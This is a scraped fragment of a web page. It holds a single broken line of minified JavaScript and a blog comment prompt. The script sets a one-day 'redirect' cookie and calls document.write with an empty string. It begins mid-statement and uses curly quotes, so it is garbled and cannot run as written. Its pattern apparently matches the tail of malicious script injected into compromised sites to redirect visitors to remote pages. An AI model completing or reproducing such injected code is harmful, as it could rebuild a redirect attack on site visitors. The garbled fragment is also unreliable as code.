time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published.